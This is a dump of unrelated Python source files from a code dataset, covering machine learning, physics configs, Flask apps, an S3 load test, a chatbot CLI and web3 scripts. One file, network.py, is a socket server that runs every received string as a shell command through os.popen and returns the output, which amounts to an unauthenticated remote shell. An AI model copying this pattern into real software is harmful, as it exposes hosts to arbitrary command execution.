\"\"\"\n model = Sequential([\n Dense(input_shape=input_shape,\n name='layer_fc1', units=24, activation='relu'),\n Dense(name='layer_fc2', units=24, activation='relu'),\n Dense(name='layer_fc_out', units=output_shape, activation='linear'),\n ])\n model.compile(optimizer=Adam(lr=1e-2), loss='mse')\n return model\n","sub_path":"agents/cartpole/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"37545942","text":"import FWCore.ParameterSet.Config as cms\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\n\nprocess = cms.Process(\"DISPLACED\")\n\nprocess.load(\"Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff\")\nprocess.load(\"Configuration.Geometry.GeometryRecoDB_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc')\n\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1000\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(100) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n \"root://cms-xrd-global.cern.ch//store/mc/RunIISummer16MiniAODv2/SMS-T1qqqq_ctau-1_TuneCUETP8M1_13TeV-madgraphMLM-pythia8/MINIAODSIM/PUMoriond17_GridpackScan_80X_mcRun2_asymptotic_2016_TrancheIV_v6-v2/10000/023CA233-4289-E711-9B01-002590FD5A48.root\"\n )\n)\n\nprocess.options = cms.untracked.PSet(\n wantSummary = cms.untracked.bool(True),\n allowUnscheduled = cms.untracked.bool(True)\n)\n\nprocess.load('XTag.DisplacedVertex.GenDisplacedVertices_cff')\n\nprocess.MINIAODSIMoutput = cms.OutputModule(\"PoolOutputModule\", \n compressionAlgorithm = cms.untracked.string('LZMA'), \n compressionLevel = cms.untracked.int32(4), \n dataset = cms.untracked.PSet( \n dataTier = cms.untracked.string(''), \n filterName = cms.untracked.string('') \n ), \n dropMetaData = cms.untracked.string('ALL'), \n eventAutoFlushCompressedSize = cms.untracked.int32(15728640), \n fastCloning = cms.untracked.bool(False), \n fileName = cms.untracked.string('BTagging.root'), \n outputCommands = cms.untracked.vstring(\n 'drop *',\n 'keep *_displacedGenVertices_*_DISPLACED',\n ),\n overrideInputFileSplitLevels = cms.untracked.bool(True) \n) \n \n\n\nprocess.endpath = cms.EndPath(process.DisplacedGenVertexSequence*process.MINIAODSIMoutput) \n","sub_path":"DisplacedVertex/test/test_DisplacedGenVertex.py","file_name":"test_DisplacedGenVertex.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"65180055","text":"# -*- coding:utf-8 -*-\n__author__ = 'neo'\n__time__ = '2018/9/5 11:12'\nfrom app import create_app\n\n\napp = create_app()\n\n# app.add_url_rule('/hello',view_func=hello)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0',debug=app.config['DEBUG'])","sub_path":"fisher.py","file_name":"fisher.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"543292838","text":"import boto3\nfrom botocore.exceptions import NoCredentialsError\nfrom datetime import datetime\n\n\ndef upload_to_bucket(local_file, bucket, s3_file):\n s3 = boto3.client('s3')\n\n try:\n s3.upload_file(local_file, bucket, s3_file)\n print(\"Upload Successful\")\n return True\n 
except FileNotFoundError:\n        print(\"The file was not found\")\n        return False\n    except NoCredentialsError:\n        print(\"Credentials not available\")\n        return False\n\n\n# year = now.strftime(\"%Y\")\n# print(\"year:\", year)\n\n# month = now.strftime(\"%m\")\n# print(\"month:\", month)\n\n# day = now.strftime(\"%d\")\n# print(\"day:\", day)\n\n# time = now.strftime(\"%H:%M:%S\")\n# print(\"time:\", time)\n\n# date_time = now.strftime(\"%m/%d/%Y, %H:%M:%S\")\n# print(\"date and time:\",date_time)\t\n\nvar=0\nwhile var < 100:\n# while True:\n    now = datetime.now() # current date and time\n    print(now)\n    # s3_file_name=\"diagram_\" + now.strftime(\"%H:%M:%S:%f\") + \".png\"\n    s3_file_name=now.strftime(\"%f_%H:%M:%S:%f\") + \"_diagram\" + \".png\"\n    print(s3_file_name)\n    uploaded = upload_to_bucket('/home/ec2-user/environment/Amazon-S3-Bucket-Load-Test/container/diagram.png', 'amazon-s3-bucket-load-test-storagebucket-knlgpd3wpz0n', s3_file_name)\n    done = datetime.now()\n    # uploaded = upload_to_bucket('/beef/diagram.png', 'amazon-s3-bucket-load-test-storagebucket-knlgpd3wpz0n', s3_file_name)\n    var = var + 1\n    \n","sub_path":"container/load-test.py","file_name":"load-test.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"455836437","text":"#!/usr/bin/python3\n\"\"\" a script that starts a Flask web application \"\"\"\nfrom flask import Flask\nfrom flask import render_template\nfrom models import storage, State\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef remove_session(exception):\n    \"\"\" After each request, it removes the current SQLAlchemy Session \"\"\"\n    storage.close()\n\n\n@app.route('/states', strict_slashes=False)\ndef render_states():\n    \"\"\" displays all states \"\"\"\n    States = storage.all(State).values()\n    return render_template(\"9-states.html\", States=States, one=None)\n\n\n@app.route('/states/<id>', strict_slashes=False)\ndef render_one_state(id):\n    \"\"\" displays one state if it exists \"\"\"\n    key = \"State.\" + id\n    one = None\n    if key in storage.all(State):\n        one = storage.all(State)[key]\n    return render_template(\"9-states.html\", States=None, one=one)\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=5000)\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"312100880","text":"\n\nfrom datetime import date, timedelta\nfrom itertools import islice\nTODAY = date.today()\n\n\ndef gen_bite_planning(num_bites=1, num_days=1, start_date=TODAY):\n    \n    delta_days = timedelta(days=num_days)\n    poprzedni = 1\n    while True:\n        final = start_date + delta_days\n        yield final\n        if poprzedni == num_bites:\n            start_date = final\n            poprzedni = 1 \n        else:\n            poprzedni +=1\n\ngen = gen_bite_planning(num_bites=3, num_days=1, start_date=TODAY)\n\nfor _ in range(6):\n    print(next(gen))","sub_path":"6_Generator_Exercices_Days_16_18/pybytes219_generator.py","file_name":"pybytes219_generator.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"404649597","text":"#Given a string containing only three types of characters: '(', ')' and '*', write a function to check whether this string is valid. 
We define the validity of a string by these rules:\n\n#Any left parenthesis '(' must have a corresponding right parenthesis ')'.\n#Any right parenthesis ')' must have a corresponding left parenthesis '('.\n#Left parenthesis '(' must go before the corresponding right parenthesis ')'.\n#'*' could be treated as a single right parenthesis ')' or a single left parenthesis '(' or an empty string.\n#An empty string is also valid.\n\n#Example 1:\n#Input: \"()\"\n#Output: True\n#Example 2:\n#Input: \"(*)\"\n#Output: True\n#Example 3:\n#Input: \"(*))\"\n#Output: True\n#Note:\n#The string size will be in the range [1, 100].\n\nclass Solution:\n def checkValidString(self, s: str) -> bool:\n if s == \"\":\n return True\n\n stack1 = []\n stack2 = []\n l = len(s)\n\n for i in range(l):\n if s[i] == '(':\n stack1.append(i)\n elif s[i] == '*':\n stack2.append(i)\n else:\n if stack1:\n stack1.pop()\n elif stack2:\n stack2.pop()\n else:\n return False\n\n while stack1:\n if not stack2:\n return False\n else:\n if stack1.pop() >= stack2.pop():\n return False\n\n return True\n\ntest = \"(*)\"\ns = Solution()\ns.checkValidString(test)\n","sub_path":"python_code/678_Valid_Parenthesis_String.py","file_name":"678_Valid_Parenthesis_String.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"378544576","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os\nimport json\nimport sys\nimport urllib\nimport tarfile\nimport wget\nimport shutil\n\nfrom subprocess import call\n\nfrom rasa_nlu.converters import load_data\nfrom rasa_nlu.config import RasaNLUConfig\nfrom rasa_nlu.model import Trainer\n\ndef main():\n arguments = sys.argv\n if len(arguments) < 2:\n show_hint(arguments)\n else:\n method = arguments[1]\n if method == 'train':\n learn(arguments)\n elif method == 'init':\n init(arguments)\n elif method == 'hint':\n show_hint(arguments)\n elif method == 'run':\n run(arguments)\n elif method == 'build':\n build(arguments)\n elif method == \"download\":\n download(arguments)\n else:\n show_hint(arguments)\n\ndef build(arguments):\n path = os.path.join(os.getcwd(),'actions')\n files = os.listdir(path)\n imps = []\n\n for i in range(len(files)):\n name = files[i].split('.')\n if len(name) > 1:\n if name[1] == 'py' and name[0] != '__init__':\n name = name[0]\n imps.append(name)\n init_path = os.path.join(path,'__init__.py')\n file = open(init_path,'w')\n toWrite = '__all__ = ' + str(imps)\n\n file.write(toWrite)\n file.close()\n\ndef learn(arguments):\n path = os.path.join(os.getcwd(), 'train')\n if (os.path.isdir(path)):\n ac_path = os.path.join(os.getcwd(),'actions')\n files = os.listdir(ac_path)\n imps = []\n\n for i in range(len(files)):\n name = files[i].split('.')\n if len(name) > 1:\n if name[1] == 'py' and name[0] != '__init__':\n name = name[0]\n imps.append(name)\n init_path = os.path.join(ac_path,'__init__.py')\n file = open(init_path,'w')\n toWrite = '__all__ = ' + str(imps)\n\n file.write(toWrite)\n file.close()\n\n files = os.listdir(path)\n\n \n common_examples = []\n\n none_example_1 = {'text':'jshfjdhsfj','intent':'None','entities':[]}\n none_example_2 = {'text':'dfjkhjkfds','intent':'None','entities':[]}\n common_examples.append(none_example_1)\n common_examples.append(none_example_2)\n\n \n for file in files:\n file_data = file.split('.')\n intent_name = file_data[0]\n file_type = file_data[1]\n if file_type != 'txt':\n continue\n else:\n with open(path + '/' + 
file,'r') as intentFile:\n responses = []\n examples = intentFile.readlines()\n examples = [*map(lambda s: s.strip(), examples)]\n if \"<-responses->\" in examples:\n pos = examples.index(\"<-responses->\")\n responses = examples[pos+1:]\n examples = examples[:pos]\n for sample in examples:\n example = {}\n sample_split = sample.split('<=>')\n sample_text = sample_split[0]\n\n if len(sample_split) == 1:\n example['text'] = sample\n example['intent'] = intent_name\n example['entities'] = []\n else:\n #get list of entities in the sample\n sample_entities = sample_split[1:]\n\n #check if paranthesis match\n open_paran_count = sample_text.count('(')\n close_paran_count = sample_text.count(')')\n\n if open_paran_count != close_paran_count:\n raise ValueError(\"Paranthesis don't match for \" + sample_text)\n \n\n #check if paranthesis and provided entites match\n if open_paran_count != len(sample_entities):\n raise ValueError(\"The entities provided and words marked in entities don't match for \" + sample_text)\n \n \n start_pos = 0\n entities_count = 0\n no_of_entities = len(sample_entities)\n entities = []\n\n while entities_count < no_of_entities:\n start_pos = sample_text.find('(', start_pos, len(sample_text)) + 1\n end_pos = sample_text.find(')', start_pos, len(sample_text))\n \n entityLabel = {}\n\n entityLabel['start'] = start_pos - 1\n entityLabel['end'] = end_pos - 1\n entityLabel['value'] = sample_text[start_pos:end_pos]\n entityLabel['entity'] = sample_entities[entities_count].strip()\n \n entities.append(entityLabel)\n entities_count += 1\n\n example['text'] = sample_text.replace('(','').replace(')','')\n example['intent'] = intent_name\n example['entities'] = entities\n\n common_examples.append(example)\n if len(responses) > 0:\n with open(os.path.join(os.getcwd(),\"actions.json\"),\"r+\") as jsonFile:\n data = json.load(jsonFile)\n data[intent_name] = responses\n jsonFile.seek(0)\n jsonFile.truncate()\n json.dump(data, jsonFile)\n \n nlp_json = {\"rasa_nlu_data\":{\"common_examples\":common_examples}}\n\n with open(os.path.join(path, 'train.json'),\"w\") as trainFile:\n json.dump(nlp_json, trainFile)\n\n with open(os.path.join(os.getcwd(), 'config.json'),\"r\") as jsonFile:\n data = json.load(jsonFile)\n\n jsonFile.close()\n\n training_data = load_data(os.path.join(path, 'train.json'))\n trainer = Trainer(RasaNLUConfig(os.path.join(os.getcwd(), 'config.json')))\n trainer.train(training_data)\n model_directory = trainer.persist('models')\n\n print(model_directory)\n data[\"active_model\"] = str(model_directory)\n\n with open(os.path.join(os.getcwd(), 'config.json'),\"w\") as jsonFile:\n json.dump(data, jsonFile)\n else:\n raise FileNotFoundError(\"No train folder found. Please setup a wizard bot first by running wiz create \")\n\ndef init(arguments):\n #Setup bot name\n main_name = os.getcwd().split(os.sep)[-1]\n if len(arguments) < 3:\n prompt = \"What is the name of the bot? 
(default: \" + main_name + \"):\"\n bot_name = str(input(prompt))\n if len(bot_name) == 0:\n bot_name = main_name\n else:\n bot_name = ' '.join(arguments[2:])\n print(\"Creating bot: \" + bot_name)\n\n #Setup actions folder\n print(\"Creating actions folder....\")\n directory = os.path.join(os.getcwd(),'actions')\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n #Configure actions folder\n print(\"Configuring actions folder....\")\n directory = os.path.join(os.getcwd(),'actions')\n with open(os.path.join(directory,'__init__.py'), \"w\") as initFile:\n initFile.write(\"#It will be initialized at runtime\")\n\n #Setup train folder\n print(\"Creating train folder....\")\n directory = os.path.join(os.getcwd(),'train')\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n #Setup config.json file\n print(\"Creating config.json...\")\n file_path = os.path.join(os.getcwd(),'config.json')\n with open(file_path, \"w\") as jsonFile:\n data = {}\n data[\"name\"] = bot_name\n data[\"pipeline\"] = \"mitie_sklearn\"\n data[\"mitie_file\"] = \"./train/total_word_feature_extractor.dat\"\n data[\"channels\"] = {}\n json.dump(data, jsonFile)\n\n #Setup actions.json file\n print(\"Creating actions.json...\")\n file_path = os.path.join(os.getcwd(),'actions.json')\n with open(file_path, \"w\") as jsonFile:\n data = {}\n json.dump(data,jsonFile)\n\n #Setup main.py file\n print(\"Creating main.py...\")\n file_path = os.path.join(os.getcwd(),'main.py')\n with open(file_path, \"w\") as mainFile:\n mainFile.write(\"from flask import Flask\\n\")\n mainFile.write(\"from flask_wizard import Wizard\\n\")\n mainFile.write(\"\\n\")\n mainFile.write(\"app = Flask(__name__)\\n\")\n mainFile.write(\"wizard = Wizard(app)\\n\")\n mainFile.write(\"\\n\")\n mainFile.write(\"if __name__ == '__main__':\\n\")\n mainFile.write(\"\\tapp.run()\")\n\n #Download mitie file\n print(\"Setting up Mitie model file...\")\n print(\"Installing Mitie\")\n\n if os.name == 'nt':\n #windows operating system\n call([\"pip\",\"install\",\"git+https://github.com/mit-nlp/MITIE.git#egg=mitie\"])\n else:\n #linux, unix or macos\n if sys.version_info >= (3,0):\n call([\"pip3\",\"install\",\"git+https://github.com/mit-nlp/MITIE.git#egg=mitie\"])\n else:\n call([\"pip\",\"install\",\"git+https://github.com/mit-nlp/MITIE.git#egg=mitie\"])\n print(\"Choose one of the options below\")\n print(\"1. Download Mitie models (size>400MB, so if you already have the total_word_feature_extractor.dat file use it. You can find it in the train folder if you already set up wiz before\")\n print(\"2. 
Copy from existing path\")\n choice = str(input(\"Choice (1 default): \"))\n if len(choice)==0 or choice == \"1\":\n directory_path = os.path.join(os.getcwd(),'train')\n file_path = os.path.join(directory_path,'mitie.tar.bz2')\n wget.download(\"https://github.com/mit-nlp/MITIE/releases/download/v0.4/MITIE-models-v0.2.tar.bz2\",'mitie.tar.bz2')\n\n #Extracting mitie file\n print(\"\")\n print(\"Extracting Mitie model (this might take a couple of minutes)\")\n tar = tarfile.open('mitie.tar.bz2',\"r:bz2\")\n tar.extractall()\n tar.close()\n\n #Move files around and only keep total_word_feature_extractor.dat\n current_path = os.path.join(os.getcwd(),'MITIE-models','english','total_word_feature_extractor.dat')\n new_path = os.path.join(os.getcwd(),'train','total_word_feature_extractor.dat')\n os.rename(current_path, new_path)\n os.remove('mitie.tar.bz2')\n shutil.rmtree(os.path.join(os.getcwd(), 'MITIE-models'))\n else:\n path = str(input(\"Enter path of existing total_word_feature_extractor.dat file: \"))\n if path[0] == '~':\n home = os.path.expanduser('~')\n path = path.replace('~',home)\n if os.path.exists(path):\n shutil.copyfile(path,os.path.join(os.getcwd(),'train','total_word_feature_extractor.dat'))\n \n #Download en model for spacy\n print(\"Setting up spacy\")\n if os.name == 'nt':\n #windows operating system\n call([\"python\",\"-m\",\"spacy\",\"download\",\"en\"])\n else:\n #linux, unix, macos\n if sys.version_info >= (3,0):\n call([\"python3\",\"-m\",\"spacy\",\"download\",\"en\"])\n else:\n call([\"python\",\"-m\",\"spacy\",\"download\",\"en\"])\n\ndef run(arguments):\n main_path = os.path.join(os.getcwd(),'main.py')\n if os.name == 'nt':\n #windows operating system\n call([\"python\",\"main.py\"])\n else:\n #linux, unix, macos operating system\n if sys.version_info >= (3,0):\n call([\"python3\",\"main.py\"])\n else:\n call([\"python\",\"main.py\"])\n\ndef download(arguments):\n directory_path = os.path.join(os.getcwd(),'train')\n file_path = os.path.join(directory_path,'mitie.tar.bz2')\n wget.download(\"https://github.com/mit-nlp/MITIE/releases/download/v0.4/MITIE-models-v0.2.tar.bz2\",'mitie.tar.bz2')\n\n #Extracting mitie file\n print(\"\")\n print(\"Extracting Mitie model (this might take a couple of minutes)\")\n tar = tarfile.open('mitie.tar.bz2',\"r:bz2\")\n tar.extractall()\n tar.close()\n\n #Move files around and only keep total_word_feature_extractor.dat\n current_path = os.path.join(os.getcwd(),'MITIE-models','english','total_word_feature_extractor.dat')\n new_path = os.path.join(os.getcwd(),'train','total_word_feature_extractor.dat')\n os.rename(current_path, new_path)\n os.remove('mitie.tar.bz2')\n shutil.rmtree(os.path.join(os.getcwd(), 'MITIE-models'))\n\ndef show_hint(arguments):\n print(\"Please provide the right option or command you want to run\")\n print(\"Accepted commands: \")\n print(\"-------------------------------------------\")\n print(\"wiz hint #to see list of commands\")\n print(\"wiz train #to train the nlp model\")\n print(\"wiz create #to create a new bot\")\n","sub_path":"flask_wizard_cli/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":13083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"146340412","text":"from __future__ import print_function\n\nimport enchant\nimport inflect\nimport nltk\nimport pprint\nimport re\nimport string\nfrom __builtin__ import len\nfrom __builtin__ import list\nfrom textblob import TextBlob\n\nenglish = 
enchant.Dict(\"en_US\")\n\ninflect_engine = inflect.engine()\n\nnoun = ['NN', 'NNS', 'NNP', 'NNPS']\nadj = ['JJ', 'JJR', 'JJS']\n\nstopwords = ['i', 's', 'able', 'isn', \\\n 'doesn', 'only', 'sa', 'mom', 'other', \\\n 'man', 'more', 'months', 'years', \\\n 'weeks', 'week', 'year', 'month', 'time', \\\n 'one', 'night', 'fav', 'girl', 'bye', 'lol'\\\n 'thing', 'son', 'bit', 'day', 'sorry', \\\n 'visit', 'item', 'lil', 'lot', 'eye'\\\n 'fire', 'jar', 'restriction' , 'norm', 'list',\n 'line', 'shape', 'ice', 'nit', 'vist', 'turf']\npp = pprint.PrettyPrinter(depth=6)\n\n\ndef get_type(data_dict):\n if len(data_dict.keys()) == 0:\n return \"other\", None\n max = -99999\n ret = list(data_dict.keys())[0]\n\n for key in data_dict.keys():\n if data_dict[key] > max:\n max = data_dict[key]\n ret = key\n return ret, max\n\n\ndef for_each_review_(review, ret_data_dict, dict_):\n del review['_id']\n scored_terms = review['score']\n\n for term in scored_terms.keys():\n skip = False\n nn = None\n t_list = []\n l_list = []\n nn_count = 0\n aa_count = 0\n term = term.lower().strip().replace(\" \", \" \")\n term_list = term.split(\" \")\n list_words = [] # nltk.pos_tag(term_list)\n try:\n for word in term_list:\n if word in stopwords:\n skip = True\n list_words.append((word, dict_[word]))\n\n except Exception as e:\n # print(\"not in sentence : \" + str(e) + \" : \" + str(term_list))\n skip = True\n\n if len(list_words) > 2:\n\n if dict_[term_list[2]] in noun and dict_[term_list[1]] in adj:\n '''\n Let it be !\n '''\n else:\n print(list_words)\n skip = True\n\n for elem in list_words:\n if len(elem[0]) < 3:\n skip = True\n\n if elem[1] in noun:\n nn_count += 1\n\n item = inflect_engine.singular_noun(elem[0])\n if not item:\n item = elem[0]\n nn = item\n l_list.append(item)\n\n elif elem[1] in adj:\n aa_count += 1\n\n l_list.append(elem[0])\n else:\n l_list.append(elem[0])\n\n term_list = l_list\n term_mod = ' '.join(l_list)\n\n object = {\n 'word_pairs': term,\n 'frequency': {\n\n },\n 'noun': nn,\n 'tagged_text': list_words\n }\n\n for item in term_list:\n object['frequency'][item] = 1\n t_list.append(item)\n\n if len(l_list) > 2:\n # print(\"--\", l_list)\n term_mod = term_list[0] + \"-\" + term_list[1] + \" \" + term_list[2]\n\n object['word_pairs'] = term_mod\n object['type'], object['type_score'] = get_type(scored_terms[term])\n object['polarity'] = TextBlob(term_mod).sentiment.polarity\n object['business_id'] = review['business_id']\n object_type = object['type']\n\n # print (object,skip)\n\n if nn_count == 1 and aa_count > 0 and skip is False and nn is not None:\n try:\n obj = ret_data_dict[object['business_id']][object_type][term_mod]\n object['polarity'] = TextBlob(term_mod).sentiment.polarity\n object['type_score'] = (object['type_score'] + obj['type_score'])\n\n for txt in obj['frequency'].keys():\n object['frequency'][txt] += obj['frequency'][txt]\n\n ret_data_dict[object['business_id']][object_type][term_mod] = object\n\n except:\n try:\n ret_data_dict[object['business_id']][object_type][term_mod] = object\n except:\n try:\n oo = ret_data_dict[object['business_id']]\n except:\n ret_data_dict[object['business_id']] = {}\n\n ret_data_dict[object['business_id']][object_type] = {}\n ret_data_dict[object['business_id']][object_type][term_mod] = object\n\n noun_in_t = ret_data_dict[object['business_id']][object_type][term_mod]['noun']\n ret_data_dict[object['business_id']][object_type][term_mod]['noun_frequency'] = \\\n 
ret_data_dict[object['business_id']][object_type][term_mod]['frequency'][noun_in_t]\n # else:\n # print(\" - \", \"list : \", list_words, \"noun_count : \", nn_count, \"skip : \", skip, \"noun : \", nn,\n # (nn_count == 1 and skip is False and nn is not None)) # , list(review['text'].keys()))\n\n return ret_data_dict\n\n\ndef get_word_pairs(review_list, mongo_connection):\n query = {\n 'review_id': {\n '$in': review_list\n }\n }\n what = {\n 'review_id': 1,\n 'polarity': 1,\n 'score': 1,\n 'business_id': 1,\n 'stars': 1,\n 'tf_idf': 1,\n 'final': 1,\n }\n\n reviews_text = [x['text'] for x in list(mongo_connection.db.yelp_reviews.find(query))]\n\n final_para = []\n for text in reviews_text:\n text = text.lower(). \\\n replace(\"!\", \" \"). \\\n replace('/', \" \"). \\\n replace(\" \", \" \"). \\\n replace(\"\\t\", \" \"). \\\n replace(\"\\n\", \" \"). \\\n replace(\"~\", \" \"). \\\n lstrip()\n\n regex = re.compile('[%s]' % re.escape(string.punctuation))\n text = regex.sub(' ', text)\n text = text.split(\" \")\n\n ret_text = []\n for word in text:\n if len(word) > 1:\n ret_text.append(word)\n final_para.append(ret_text)\n\n text_tagged = nltk.pos_tag_sents(final_para)\n\n dict_ = {}\n for texxt in text_tagged:\n for word in texxt:\n dict_[word[0]] = word[1]\n # pp.pprint(dict_)\n\n processed = list(mongo_connection.db.yelp_review_scored_pair_all_not_final.find(query, what))\n\n ret_list = {}\n for review in processed:\n ret_list = for_each_review_(review, ret_list, dict_)\n\n ret_list['business_es'] = list(ret_list.keys())\n\n return ret_list\n\n\ndef create_groups(data_types):\n ret_dict = {}\n nouns = []\n for key in data_types.keys():\n\n obj = data_types[key]\n noun_key = obj['noun']\n\n skip = False\n\n if noun_key in ret_dict.keys():\n if ret_dict[noun_key]['count'] > 9:\n skip = True\n\n if skip is False:\n if noun_key in ret_dict.keys():\n ret_dict[noun_key]['count'] += obj['noun_frequency']\n ret_dict[noun_key]['polarity'] += obj['polarity']\n ret_dict[noun_key]['objects'].append(obj)\n else:\n ret_dict[noun_key] = {\n 'count': obj['noun_frequency'],\n 'objects': [obj],\n 'polarity': obj['polarity'],\n 'noun': noun_key\n }\n\n nouns.append(obj['noun'])\n\n final_ret = []\n for key in ret_dict.keys():\n # if (ret_dict[key]['count'] > 1) and (ret_dict[key]['polarity'] < -0.1 or ret_dict[key]['polarity'] > 0.1):\n ret_dict[key]['objects'] = sorted(ret_dict[key]['objects'], key=lambda x: x['noun_frequency'], reverse=True)\n ret_dict[key]['polarity'] = ret_dict[key]['polarity'] / len(ret_dict[key]['objects'])\n\n final_ret.append(ret_dict[key])\n\n final_ret = sorted(final_ret, key=lambda x: x['count'], reverse=True)\n return final_ret\n","sub_path":"server/mod_api/get_word_pairs.py","file_name":"get_word_pairs.py","file_ext":"py","file_size_in_byte":7851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"467258443","text":"# _*_coding:utf-8_*_\n# TCP UDP\n# tcp 三次握手 类似打电话\n\nimport _thread\nimport os\nimport socket\nimport threading\n\nthreadLock = threading.Lock()\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self, isServer):\n threading.Thread.__init__(self)\n self.isServer = isServer\n if isServer:\n self.server = socket.socket()\n else:\n self.client = socket.socket()\n\n def run(self):\n if self.isServer:\n self.server.bind(('127.0.0.1', 8995))\n self.server.listen()\n con, addr = self.server.accept()\n while 1:\n # threadLock.acquire()\n data = con.recv(1024)\n print(\"server recv \", data.decode('utf-8'))\n ret = 
os.popen(data.decode('utf-8'))\n msg = ret.read()\n if not msg.strip(): msg = \"ok\"\n con.send(msg.encode('utf-8'))\n # threadLock.release()\n\n else:\n self.client.connect(('127.0.0.1', 8995))\n while 1:\n # threadLock.acquire()\n msg = input(\"客户传送:\").strip()\n self.client.send(msg.encode())\n data = self.client.recv(10240)\n print(data.decode('utf-8'))\n # threadLock.release()\n\n\nthread1 = MyThread(True)\nthread2 = MyThread(False)\n# 线程不行,需要使用进程\nthread1.start()\nthread2.start()\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"457943915","text":"\"\"\"These tests make actual orders on the Bodega infrastructure.\n\nThey are not meant to be tested in an automated fashion.\n\"\"\"\n\nimport json\nimport logging\nimport os\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) # noqa\nSCRIPT_NAME = os.path.basename(__file__) # noqa\nSDMAIN_ROOT = \\\n os.path.abspath(os.path.join(SCRIPT_DIR, '..', '..', '..')) # noqa\n\nfrom bodega_commands import BodegaCommands\n\nlog = logging.getLogger(os.path.basename(__name__))\n\n\ndef test_place_order(commands):\n requirements = {\n \"nickname_0\": {\n \"type\": \"rktest_yml\",\n \"requirements\": {\n \"platform\": \"DYNAPOD\"\n }\n },\n }\n order_sid = commands.place_order(requirements)[0]\n assert order_sid\n return order_sid\n\n\ndef test_close_order(commands, order_sid):\n assert commands.close_order(order_sid)\n\n\ndef test_describe_order(commands, order_sid):\n result = json.dumps(commands.describe_order(order_sid), indent=4,\n sort_keys=True)\n log.info(result)\n assert result\n\n\ndef test_extend_order(commands, order_sid):\n result = json.dumps(commands.extend_order(order_sid), indent=4,\n sort_keys=True)\n log.info(result)\n assert result\n\n\ndef test_raw_request(commands):\n result = json.dumps(commands.raw_request('GET', '/profile/'), indent=4,\n sort_keys=True)\n log.info(result)\n assert result\n\n\ndef test_list_orders(commands):\n user_profile = commands.get_current_user_profile()\n result = commands.list_orders(user_email=user_profile['email'],\n status='LIVE')\n result = json.dumps(result, indent=4, sort_keys=True)\n log.info(result)\n assert result\n\nif __name__ == '__main__':\n commands = BodegaCommands()\n\n order_sid = test_place_order(commands)\n test_describe_order(commands, order_sid)\n test_list_orders(commands)\n test_extend_order(commands, order_sid)\n test_close_order(commands, order_sid)\n test_raw_request(commands)\n","sub_path":"lab/bodega/client/bodega_commands_test.py","file_name":"bodega_commands_test.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"280511749","text":"import json\nimport os\nfrom multiprocessing.pool import ThreadPool\nfrom web3 import Web3, IPCProvider\n\nfrom custom_http_provider import CustomHTTPProvider\n\nINFURA_ADDRESS = 'https://mainnet.infura.io/v3/4facf9a657054a2287e6a4bec21046a3'\nDEFAULT_REQUEST_TIMEOUT = 30\n\nweb3_infura = Web3(CustomHTTPProvider(endpoint_uri=INFURA_ADDRESS, request_kwargs={'timeout': DEFAULT_REQUEST_TIMEOUT}))\n\nweb3 = Web3(IPCProvider())\n\nETH = 10 ** 18\n\nUNISWAP_BEGIN_BLOCK = 6627917\n\nHISTORY_BEGIN_BLOCK = 6628000\n\nHISTORY_CHUNK_SIZE = 5000\n\nREORG_PROTECTION_BLOCKS_COUNT = 50\n\nCURRENT_BLOCK = web3.eth.blockNumber - REORG_PROTECTION_BLOCKS_COUNT\n\nLOGS_BLOCKS_CHUNK = 1000\n\nTHREADS = 8\n\npool = 
